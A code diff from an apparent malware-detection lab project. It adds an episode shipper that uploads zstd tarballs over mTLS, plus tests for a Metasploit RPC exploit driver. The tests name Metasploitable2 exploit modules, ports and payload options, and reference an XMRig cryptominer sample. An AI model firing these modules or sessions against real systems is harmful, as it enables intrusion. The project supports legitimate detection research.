+            receiver=receiver,
+            scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
+            request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
+            keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
+        )
+
+
+def _optional_path(v: object) -> Path | None:
+    if v in (None, ""):
+        return None
+    if isinstance(v, str):
+        return Path(v).expanduser()
+    raise TypeError(f"expected path string, got {type(v).__name__}")
--- a/shipper/queue.py
+++ b/shipper/queue.py
@ -0,0 +1,195 @@
+"""Shipper episode queue — scan, compress, ship, retire.
+
+State machine, mirroring docs/transport.md:
+
+    data/episodes/<id>/done.marker
+        |
+        v
+    tar+zstd → data/outbox/<id>.tar.zst.partial
+        |
+        v
+    rename → data/outbox/<id>.tar.zst
+        |
+        v
+    PUT to receiver
+        |
+        +-- 200/201 → mv data/episodes/<id> → data/shipped/<id>
+        |             rm data/outbox/<id>.tar.zst
+        |
+        +-- 409     → leave files in place (the local + remote tarball
+        |             differ; manual triage)
+        |
+        +-- 5xx/net → leave outbox tarball; retry on next pass
+        |
+        +-- 4xx     → log + skip (caller-side bug, doesn't self-heal)
+
+Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
+which the next pass overwrites. A crash mid-PUT leaves the tarball in
+``outbox/`` and the next pass re-ships it; the receiver responds 200
+on a matching sha256, 409 on a divergent one.
+"""
+
+from __future__ import annotations
+
+import logging
+import shutil
+import subprocess
+import tarfile
+import tempfile
+import time
+from dataclasses import dataclass
+from pathlib import Path
+
+from .config import ShipperConfig
+from .transport import ShipperTransport, ShipResult, hash_file
+
+
+log = logging.getLogger("cis490.shipper.queue")
+
+
+@dataclass(frozen=True)
+class PassResult:
+    scanned: int
+    shipped: int
+    transient_failures: int
+    conflicts: int
+    fatal: int
+
+
+class ShipperQueue:
+    def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
+        self.cfg = cfg
+        self.transport = transport
+        cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
+        cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
+        cfg.shipped_dir.mkdir(parents=True, exist_ok=True)
+
+    # ---- main entry point ---------------------------------------------
+
+    def run_once(self) -> PassResult:
+        """One scan pass. Returns counts for logging / tests."""
+        ready = self._ready_episodes()
+        scanned = len(ready)
+        shipped = 0
+        transient = 0
+        conflicts = 0
+        fatal = 0
+
+        for ep_dir in ready:
+            episode_id = ep_dir.name
+            try:
+                tarball, sha = self._tar_episode(ep_dir)
+            except Exception:
+                log.exception("tar failed for %s", episode_id)
+                transient += 1
+                continue
+
+            res = self.transport.ship_tarball(episode_id, tarball, sha)
+            log.info(
+                "ship %s -> %s (%d) %s",
+                episode_id, res.status, res.status_code, res.error or "",
+            )
+
+            if res.status in ("stored", "already-present"):
+                self._retire(ep_dir, tarball)
+                shipped += 1
+            elif res.status == "conflict":
+                conflicts += 1
+                # Keep the tarball + episode dir in place. Operator must
+                # decide whether to drop our copy or fix the remote one.
+            elif res.status == "transient":
+                transient += 1
+            else:  # fatal
+                fatal += 1
+
+        return PassResult(
+            scanned=scanned,
+            shipped=shipped,
+            transient_failures=transient,
+            conflicts=conflicts,
+            fatal=fatal,
+        )
+
+    def run_forever(self, *, stop_check=lambda: False) -> None:
+        while not stop_check():
+            try:
+                self.run_once()
+            except Exception:
+                log.exception("scan pass crashed; sleeping anyway")
+            # Coarse sleep: we don't need precise scheduling and we
+            # don't want a tight loop on errors.
+            t0 = time.monotonic()
+            while time.monotonic() - t0 < self.cfg.scan_interval_s:
+                if stop_check():
+                    return
+                time.sleep(0.5)
+
+    # ---- internals -----------------------------------------------------
+
+    def _ready_episodes(self) -> list[Path]:
+        out: list[Path] = []
+        if not self.cfg.episodes_dir.exists():
+            return out
+        for ep in sorted(self.cfg.episodes_dir.iterdir()):
+            if ep.is_dir() and (ep / "done.marker").exists():
+                out.append(ep)
+        return out
+
+    def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
+        """Tar+zstd the episode dir into outbox. Idempotent — overwrites
+        any prior partial. Returns ``(tarball_path, sha256_hex)``."""
+        episode_id = ep_dir.name
+        outbox = self.cfg.outbox_dir
+        partial = outbox / f"{episode_id}.tar.zst.partial"
+        final = outbox / f"{episode_id}.tar.zst"
+
+        partial.unlink(missing_ok=True)
+
+        # We use the system `zstd` for streaming compression: pipe a
+        # tar stream into `zstd -T0 -19` to get a deterministic tarball
+        # without buffering the whole tar in memory or pulling in the
+        # python-zstandard dependency. Falls back to in-process `zstd`
+        # via the python wheel if the binary isn't on PATH.
+        if _which_zstd():
+            with partial.open("wb") as zout:
+                proc = subprocess.Popen(
+                    ["zstd", "-q", "-T0", "-19", "--stdout"],
+                    stdin=subprocess.PIPE, stdout=zout,
+                )
+                assert proc.stdin is not None
+                with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
+                    tf.add(ep_dir, arcname=episode_id, recursive=True)
+                proc.stdin.close()
+                rc = proc.wait()
+                if rc != 0:
+                    partial.unlink(missing_ok=True)
+                    raise RuntimeError(f"zstd exited {rc}")
+        else:
+            # Fallback: pipe through python's built-in zlib via gzip is
+            # NOT compatible (we want zstd). Surface the missing binary
+            # rather than silently producing a non-zstd tarball.
+            partial.unlink(missing_ok=True)
+            raise RuntimeError(
+                "the `zstd` binary is required on the lab host. "
+                "Install it via your package manager."
+            )
+
+        sha = hash_file(partial)
+        partial.replace(final)
+        return final, sha
+
+    def _retire(self, ep_dir: Path, tarball: Path) -> None:
+        """Move episode dir → shipped/, drop the tarball."""
+        target = self.cfg.shipped_dir / ep_dir.name
+        if target.exists():
+            # Belt-and-suspenders: re-shipping an already-retired
+            # episode shouldn't happen (the dir was moved), but if it
+            # does, prefer the existing copy and just clean up.
+            shutil.rmtree(ep_dir, ignore_errors=True)
+        else:
+            ep_dir.replace(target)
+        tarball.unlink(missing_ok=True)
+
+
+def _which_zstd() -> bool:
+    return shutil.which("zstd") is not None
--- a/shipper/transport.py
+++ b/shipper/transport.py
@ -0,0 +1,203 @@
+"""HTTP transport for the lab-host shipper.
+
+Two operations against the receiver:
+  POST /v1/ping                                  — smoke test
+  PUT  /v1/episodes/<host>/<episode>.tar.zst     — episode upload
+
+Auth is mTLS (client cert from wg-pki) when configured. A bearer token
+is supported as a stand-in during early bring-up before the cert is
+issued; production runs should set both.
+
+The transport returns small dataclasses rather than throwing — the
+caller (shipper queue) decides whether to retry, move to shipped/, or
+alert. This keeps the retry policy in one place.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import logging
+import ssl
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+import httpx
+
+from .config import ReceiverEndpoint, ShipperConfig
+
+
+log = logging.getLogger("cis490.shipper.transport")
+
+
+SCHEMA_VERSION = 1
+
+
+@dataclass(frozen=True)
+class PingResult:
+    ok: bool
+    status_code: int
+    body: dict[str, Any] | None
+    error: str | None
+
+
+@dataclass(frozen=True)
+class ShipResult:
+    status: str               # "stored" | "already-present" | "conflict" | "transient" | "fatal"
+    status_code: int
+    sha256: str | None
+    body: dict[str, Any] | None
+    error: str | None
+
+
+def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
+    """Build an SSL context honoring the wg-pki CA bundle + client cert.
+
+    Returns True / a bundle path / a context. httpx accepts all three;
+    we use a context so we can attach the client cert for mTLS."""
+    if not rcv.url.lower().startswith("https://"):
+        return False
+    ctx = ssl.create_default_context(
+        cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
+    )
+    if not rcv.verify_tls:
+        # Dev-only path; production lab-hosts should always pin the
+        # wg-pki CA. Logged loudly so it doesn't slip through.
+        log.warning("TLS verification disabled — dev-only configuration")
+        ctx.check_hostname = False
+        ctx.verify_mode = ssl.CERT_NONE
+    if rcv.client_cert and rcv.client_key:
+        ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
+    return ctx
+
+
+class ShipperTransport:
+    def __init__(self, cfg: ShipperConfig) -> None:
+        self.cfg = cfg
+        self._verify = _build_ssl_context(cfg.receiver)
+
+    # ---- ping ----------------------------------------------------------
+
+    def ping(self) -> PingResult:
+        url = f"{self.cfg.receiver.url}/v1/ping"
+        headers = self._common_headers()
+        try:
+            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
+                r = c.post(url, headers=headers, content=b"")
+        except httpx.HTTPError as e:
+            return PingResult(ok=False, status_code=0, body=None, error=str(e))
+
+        body: dict[str, Any] | None = None
+        try:
+            body = r.json()
+        except Exception:
+            pass
+
+        if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
+            return PingResult(ok=True, status_code=200, body=body, error=None)
+        return PingResult(
+            ok=False,
+            status_code=r.status_code,
+            body=body,
+            error=f"unexpected status {r.status_code}",
+        )
+
+    # ---- ship ----------------------------------------------------------
+
+    def ship_tarball(
+        self,
+        episode_id: str,
+        tarball_path: Path,
+        sha256_hex: str,
+    ) -> ShipResult:
+        url = (
+            f"{self.cfg.receiver.url}/v1/episodes/"
+            f"{self.cfg.host_id}/{episode_id}.tar.zst"
+        )
+        size = tarball_path.stat().st_size
+        headers = self._common_headers() | {
+            "Content-Type": "application/zstd",
+            "Content-Length": str(size),
+            "X-Content-SHA256": sha256_hex,
+            "X-Episode-Id": episode_id,
+        }
+
+        try:
+            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
+                    tarball_path.open("rb") as body:
+                # httpx streams from a file-like object via the `content=` kwarg.
+                r = c.put(url, headers=headers, content=body)
+        except httpx.HTTPError as e:
+            return ShipResult(
+                status="transient",
+                status_code=0,
+                sha256=None,
+                body=None,
+                error=str(e),
+            )
+
+        body_json: dict[str, Any] | None = None
+        try:
+            body_json = r.json()
+        except Exception:
+            pass
+
+        if r.status_code == 201:
+            return ShipResult(
+                status="stored",
+                status_code=201,
+                sha256=sha256_hex,
+                body=body_json,
+                error=None,
+            )
+        if r.status_code == 200:
+            return ShipResult(
+                status="already-present",
+                status_code=200,
+                sha256=sha256_hex,
+                body=body_json,
+                error=None,
+            )
+        if r.status_code == 409:
+            return ShipResult(
+                status="conflict",
+                status_code=409,
+                sha256=sha256_hex,
+                body=body_json,
+                error="receiver already has a different sha256 for this id",
+            )
+        if 500 <= r.status_code < 600:
+            return ShipResult(
+                status="transient",
+                status_code=r.status_code,
+                sha256=None,
+                body=body_json,
+                error=f"server error {r.status_code}",
+            )
+        # 4xx other than 409: caller-side bug — don't retry.
+        return ShipResult(
+            status="fatal",
+            status_code=r.status_code,
+            sha256=None,
+            body=body_json,
+            error=f"client error {r.status_code}",
+        )
+
+    # ---- helpers -------------------------------------------------------
+
+    def _common_headers(self) -> dict[str, str]:
+        h: dict[str, str] = {
+            "X-Lab-Host": self.cfg.host_id,
+            "X-Schema-Version": str(SCHEMA_VERSION),
+        }
+        if self.cfg.receiver.bearer_token:
+            h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
+        return h
+
+
+def hash_file(path: Path) -> str:
+    h = hashlib.sha256()
+    with path.open("rb") as f:
+        for chunk in iter(lambda: f.read(1024 * 1024), b""):
+            h.update(chunk)
+    return h.hexdigest()
--- a/tests/test_episode.py
+++ b/tests/test_episode.py
@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
    assert result.episode_dir == tmp_path / "episodes" / "01TEST"


+def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
+    """EpisodeConfig.sample → meta.sample carries identity + kind so
+    trainers can join episodes by family/sha256 without re-deriving
+    from events. With no Sample, meta.sample stays null."""
+    import os as _os
+
+    from samples.manifest import Sample
+
+    s = Sample(
+        name="xmrig-cryptominer",
+        family="XMRig",
+        category="cryptominer",
+        profile="cpu-saturate",
+        sha256="abc" * 21 + "d",  # 64 hex
+        source="MalwareBazaar",
+    )
+    cfg = EpisodeConfig(
+        target_pid=_os.getpid(),
+        duration_s=0.1,
+        interval_ms=50,
+        data_root=tmp_path,
+        sample=s,
+    )
+    result = EpisodeRunner(cfg).run()
+
+    meta = json.loads((result.episode_dir / "meta.json").read_text())
+    assert meta["sample"] is not None
+    assert meta["sample"]["name"] == "xmrig-cryptominer"
+    assert meta["sample"]["family"] == "XMRig"
+    assert meta["sample"]["category"] == "cryptominer"
+    assert meta["sample"]["profile"] == "cpu-saturate"
+    assert meta["sample"]["kind"] == "real"
+    assert meta["sample"]["sha256"] == "abc" * 21 + "d"
+
+
+def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
+    """No sample passed → the v1 fallback path. meta.sample stays
+    null so trainers can detect (and filter out) info-less runs."""
+    import os as _os
+
+    cfg = EpisodeConfig(
+        target_pid=_os.getpid(),
+        duration_s=0.1,
+        interval_ms=50,
+        data_root=tmp_path,
+    )
+    result = EpisodeRunner(cfg).run()
+    meta = json.loads((result.episode_dir / "meta.json").read_text())
+    assert meta["sample"] is None
+
+
 def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
    """done.marker should not appear until meta.json has ended_at_wall set."""
    cfg = EpisodeConfig(
--- a/tests/test_exploits.py
+++ b/tests/test_exploits.py
@ -0,0 +1,484 @@
+"""Tests for the Tier-3 exploit driver and its module loader.
+
+The msfrpc transport itself is exercised against a fake client so the
+suite runs in-process. A live-msfrpcd integration test is out of
+scope here — the wire format is small and the high-value coverage is
+the phase-to-action mapping plus the events the driver emits.
+"""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+from typing import Any
+
+import pytest
+
+from exploits.driver import DriverConfig, MSFExploitDriver
+from exploits.modules import ModuleConfig, load_module_config
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+MODULES_DIR = REPO_ROOT / "exploits" / "modules"
+
+
+# -----------------------------------------------------------------------
+# Module config loader
+# -----------------------------------------------------------------------
+
+def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
+    """The fleet's entry-vector variety depends on the module catalog
+    being populated. Five Metasploitable2 vectors is the minimum
+    that gives the trainer a non-trivial diversity of armed →
+    infecting transition shapes."""
+    from exploits.modules import load_module_configs
+    catalog = load_module_configs(MODULES_DIR)
+    assert len(catalog) >= 5, \
+        f"only {len(catalog)} modules; need at least 5 for fleet variety"
+    names = set(catalog.keys())
+    expected = {
+        "vsftpd_234_backdoor",
+        "samba_usermap_script",
+        "distccd_command_exec",
+        "php_cgi_arg_injection",
+        "unreal_ircd_3281_backdoor",
+    }
+    missing = expected - names
+    assert not missing, f"missing canonical modules: {missing}"
+
+
+def test_load_vsftpd_module_config_round_trip() -> None:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    assert cfg.name == "vsftpd_234_backdoor"
+    assert cfg.module_type == "exploit"
+    assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
+    assert cfg.options["RPORT"] == 21
+    assert cfg.options["RHOSTS"] == "{{ target_ip }}"
+    assert cfg.payload_path == "cmd/unix/interact"
+
+
+def test_render_options_substitutes_target_ip() -> None:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    rendered = cfg.render_options(target_ip="10.200.0.10")
+    assert rendered["RHOSTS"] == "10.200.0.10"
+    assert rendered["RPORT"] == 21
+    assert rendered["PAYLOAD"] == "cmd/unix/interact"
+
+
+def test_select_module_is_deterministic() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    assert a is b
+
+
+def test_select_module_diversifies_across_hosts() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    matches = 0
+    for slot in range(20):
+        a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
+        b = select_module(catalog, host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    assert matches < 15, "host_id seed isn't producing module variety"
+
+
+def test_select_module_walks_catalog() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    seen = set()
+    for ep in range(200):
+        seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
+    assert seen == set(catalog.keys()), \
+        f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
+
+
+def test_module_target_port_pulls_rport() -> None:
+    from exploits.modules import load_module_configs, module_target_port
+    catalog = load_module_configs(MODULES_DIR)
+    assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
+    assert module_target_port(catalog["samba_usermap_script"]) == 139
+    assert module_target_port(catalog["distccd_command_exec"]) == 3632
+    assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
+    assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
+
+
+def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
+    p = tmp_path / "x.toml"
+    p.write_text(
+        '[module]\n'
+        'type = "exploit"\n'
+        'path = "unix/ftp/example"\n'
+        '[module.options]\n'
+        'RHOSTS = "{{target_ip}}"\n'
+        'LHOST  = "{{ target_ip }}"\n'
+    )
+    cfg = load_module_config(p)
+    rendered = cfg.render_options(target_ip="10.0.0.5")
+    assert rendered["RHOSTS"] == "10.0.0.5"
+    assert rendered["LHOST"] == "10.0.0.5"
+
+
+def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text('[module]\ntype = "exploit"\n')
+    with pytest.raises(ValueError, match="module.path"):
+        load_module_config(p)
+
+
+def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
+    )
+    with pytest.raises(ValueError, match="module.type"):
+        load_module_config(p)
+
+
+# -----------------------------------------------------------------------
+# Exploit driver — phase transitions against a fake MSFRpcClient
+# -----------------------------------------------------------------------
+
+class FakeMSFRpcClient:
+    """Stand-in that records every method called and lets a test
+    script the apparent state of msfrpcd (sessions, return values)."""
+
+    def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
+        self.calls: list[tuple[str, tuple, dict]] = []
+        self.logged_in = False
+        self._fired = False
+        self._sessions: dict[int, dict[str, Any]] = {}
+        self._sessions_after_fire = sessions_after_fire or {}
+        self.shell_writes: list[tuple[int, str]] = []
+
+    def _record(self, name: str, *args, **kwargs) -> None:
+        self.calls.append((name, args, kwargs))
+
+    def login(self) -> None:
+        self._record("login")
+        self.logged_in = True
+
+    def logout(self) -> None:
+        self._record("logout")
+        self.logged_in = False
+
+    def session_list(self) -> dict[int, dict[str, Any]]:
+        self._record("session_list")
+        return dict(self._sessions)
+
+    def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
+        self._record("module_execute", mtype, mname, opts)
+        self._fired = True
+        # Simulate sessions appearing after the exploit fires.
+        self._sessions = dict(self._sessions_after_fire)
+        return {"job_id": 7, "uuid": "fake-uuid"}
+
+    def job_stop(self, job_id) -> dict:
+        self._record("job_stop", job_id)
+        return {"result": "success"}
+
+    def session_shell_write(self, sid: int, data: str) -> dict:
+        self._record("session_shell_write", sid, data)
+        if not data.endswith("\n"):
+            data = data + "\n"
+        self.shell_writes.append((sid, data))
+        return {"write_count": str(len(data))}
+
+    def session_shell_read(self, sid: int) -> str:
+        self._record("session_shell_read", sid)
+        return "uid=0(root) gid=0(root)\n"
+
+    def session_stop(self, sid: int) -> dict:
+        self._record("session_stop", sid)
+        self._sessions.pop(sid, None)
+        return {"result": "success"}
+
+
+def _make_driver(
+    sessions_after_fire: dict[int, dict[str, Any]] | None = None,
+    target_ip: str = "10.200.0.10",
+) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
+    events: list[tuple[str, dict]] = []
+
+    def emit(event: str, **extra: Any) -> None:
+        events.append((event, extra))
+
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip=target_ip,
+            session_open_timeout_s=0.5,  # tests must not block
+        ),
+        emit_event=emit,
+    )
+    return driver, client, events
+
+
+def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
+    driver, client, events = _make_driver()
+    client._sessions = {99: {"type": "shell"}}  # pre-existing session
+    driver.setup()
+    assert client.logged_in is True
+    assert driver._sessions_seen_at_arm == {99}
+    assert events[0][0] == "driver_setup"
+    assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
+    assert events[0][1]["target_ip"] == "10.200.0.10"
+
+
+def test_full_phase_walk_emits_expected_event_order() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
+    )
+    driver.setup()
+    for phase in [
+        "clean", "armed", "infecting",
+        "infected_running", "dormant",
+        "infected_running", "dormant",
+        "clean",
+    ]:
+        driver.set_phase(phase)
+    driver.teardown()
+
+    names = [e[0] for e in events]
+    # Order matters: fire comes before session_open, which comes before
+    # workload, which comes before kill+logout.
+    assert names.index("exploit_fire") < names.index("session_open")
+    assert names.index("session_open") < names.index("session_landing_probe")
+    assert names.index("session_landing_probe") < names.index("sample_executed")
+    assert names.count("sample_executed") == 2  # two infected_running phases
+    assert names.count("session_dormant") == 2
+    assert "session_killed" in names
+
+    # Driver should have asked the FakeClient to fire exactly once.
+    fire_calls = [c for c in client.calls if c[0] == "module_execute"]
+    assert len(fire_calls) == 1
+    _, args, _ = fire_calls[0]
+    assert args[1] == "unix/ftp/vsftpd_234_backdoor"
+    assert args[2]["RHOSTS"] == "10.200.0.10"
+    assert args[2]["PAYLOAD"] == "cmd/unix/interact"
+
+
+def test_session_open_timeout_emits_timeout_event() -> None:
+    # No sessions ever appear after fire.
+    driver, client, events = _make_driver(sessions_after_fire={})
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    names = [e[0] for e in events]
+    assert "session_open_timeout" in names
+    assert "session_open" not in names
+
+
+def test_workload_phases_are_no_op_without_session() -> None:
+    driver, client, events = _make_driver(sessions_after_fire={})
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")  # times out, no session
+    driver.set_phase("infected_running")
+    driver.set_phase("dormant")
+    # No shell writes should have happened.
+    assert client.shell_writes == []
+
+
+def test_arm_is_idempotent() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell"}},
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("armed")
+    fire_calls = [c for c in client.calls if c[0] == "module_execute"]
+    assert len(fire_calls) == 1
+
+
+def test_teardown_kills_session_and_logs_out() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell"}},
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.teardown()
+    assert any(c[0] == "session_stop" for c in client.calls)
+    assert client.logged_in is False
+    assert any(e[0] == "session_killed" for e in events)
+
+
+# -----------------------------------------------------------------------
+# Driver wired into a real EpisodeRunner — events land in events.jsonl
+# -----------------------------------------------------------------------
+
+# -----------------------------------------------------------------------
+# Driver v2 — sample-profile-driven workloads
+# -----------------------------------------------------------------------
+
+def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
+    """When constructed with a Sample, the driver should send the
+    profile's start_cmd at infected_running rather than the v1
+    yes-loop. The actual command body is owned by exploits.workloads
+    and tested there; here we just confirm dispatch."""
+    from samples.manifest import Sample as _Sample
+
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
+    )
+    events: list[tuple[str, dict]] = []
+    sample = _Sample(
+        name="xmrig-cryptominer",
+        family="XMRig",
+        category="cryptominer",
+        profile="cpu-saturate",
+    )
+
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=lambda ev, **kw: events.append((ev, kw)),
+        sample=sample,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+    driver.set_phase("dormant")
+    driver.teardown()
+
+    # The shell command sent at infected_running should be the
+    # profile's multi-line wrapper — NOT the v1 single-yes line.
+    starts = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
+    assert starts == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
+
+    # The driver_setup event records sample + workload metadata.
+    setup_events = [kw for (e, kw) in events if e == "driver_setup"]
+    assert setup_events
+    assert setup_events[0]["sample"] == "xmrig-cryptominer"
+    assert setup_events[0]["sample_kind"] == "mimic"
+    assert setup_events[0]["workload_profile"] == "cpu-saturate"
+
+    # sample_executed carries the profile name + description.
+    se = [kw for (e, kw) in events if e == "sample_executed"]
+    assert se
+    assert se[0]["profile"] == "cpu-saturate"
+    assert se[0]["sample"] == "xmrig-cryptominer"
+
+
+def test_v2_distinct_workloads_per_profile() -> None:
+    """Two different profiles must produce *different* shell commands.
+    This is the property that gives the ML model varied envelopes to
+    learn from."""
+    from exploits.workloads import all_profiles, workload_for
+    from samples.manifest import Sample as _Sample
+
+    profiles = all_profiles()
+    assert len(profiles) >= 4
+    seen_starts: set[str] = set()
+    for p in profiles:
+        s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
+        w = workload_for(s)
+        assert w is not None
+        seen_starts.add(w.start_cmd)
+    # Every profile must have a distinct start_cmd.
+    assert len(seen_starts) == len(profiles), \
+        "two profiles produced the same workload — ML diversity is at risk"
+
+
+def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
+    from exploits.workloads import workload_for
+    from samples.manifest import Sample as _Sample
+
+    s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
+    w = workload_for(s)
+    assert w is not None
+    assert w.profile == "cpu-saturate"
+
+
+def test_v1_path_still_works_when_no_sample() -> None:
+    """Ensure backwards compat: a driver constructed without a sample
+    uses the original yes-loop workload."""
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=lambda *a, **kw: None,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+    driver.teardown()
+    assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
+
+
+def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
+    """When the driver is connected to a real EpisodeRunner, the
+    events it emits must show up in the episode's events.jsonl with
+    monotonic-clock timestamps (so labels and exploit events can be
+    correlated downstream)."""
+    import os
+
+    from orchestrator.episode import EpisodeConfig, EpisodeRunner
+
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
+    )
+
+    schedule = [
+        ("clean", 0.05),
+        ("armed", 0.05),
+        ("infecting", 0.05),
+        ("infected_running", 0.05),
+        ("dormant", 0.05),
+        ("clean", 0.05),
+    ]
+    ec = EpisodeConfig(
+        target_pid=os.getpid(),
+        duration_s=sum(d for _, d in schedule),
+        interval_ms=20,
+        data_root=tmp_path,
+        phase_schedule=schedule,
+    )
+    runner = EpisodeRunner(ec)
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=runner.emit_event,
+    )
+    runner.on_phase = driver.set_phase
+    driver.setup()
+    try:
+        result = runner.run()
+    finally:
+        driver.teardown()
+
+    events = [
+        json.loads(l)
+        for l in (result.episode_dir / "events.jsonl").read_text().splitlines()
+    ]
+    names = [e["event"] for e in events]
+    assert "snapshot_load" in names
+    assert "driver_setup" in names
+    assert "exploit_fire" in names
+    assert "session_open" in names
+    assert "sample_executed" in names
+    assert "session_dormant" in names
+    assert "episode_end" in names
+
+    # Driver events must carry monotonic timestamps in episode-relative
+    # order (snapshot_load is essentially at origin, exploit_fire later,
+    # session_open later still, episode_end last).
+    by_name = {e["event"]: e for e in events}
+    assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000  # <1ms after origin
+    assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
+    assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
+    assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]
--- a/tests/test_fleet.py
+++ b/tests/test_fleet.py
@ -0,0 +1,392 @@
+"""Tests for fleet capacity calculation + sample manifest selection.
+
+Capacity is unit-tested via deterministic monkeypatching of /proc and
+os.cpu_count so the math is exercised independently of the host
+running the suite. Sample selection has its own tests covering the
+"different hosts pick different samples" property.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from orchestrator import fleet
+from samples.manifest import Sample, SampleManifest
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+
+
+# ---------------------------------------------------------------------------
+# Capacity
+# ---------------------------------------------------------------------------
+
+
+def _patch_capacity_inputs(
+    monkeypatch,
+    *,
+    cores: int,
+    ram_total_mib: int,
+    ram_available_mib: int,
+    load_1m: float = 0.0,
+) -> None:
+    monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
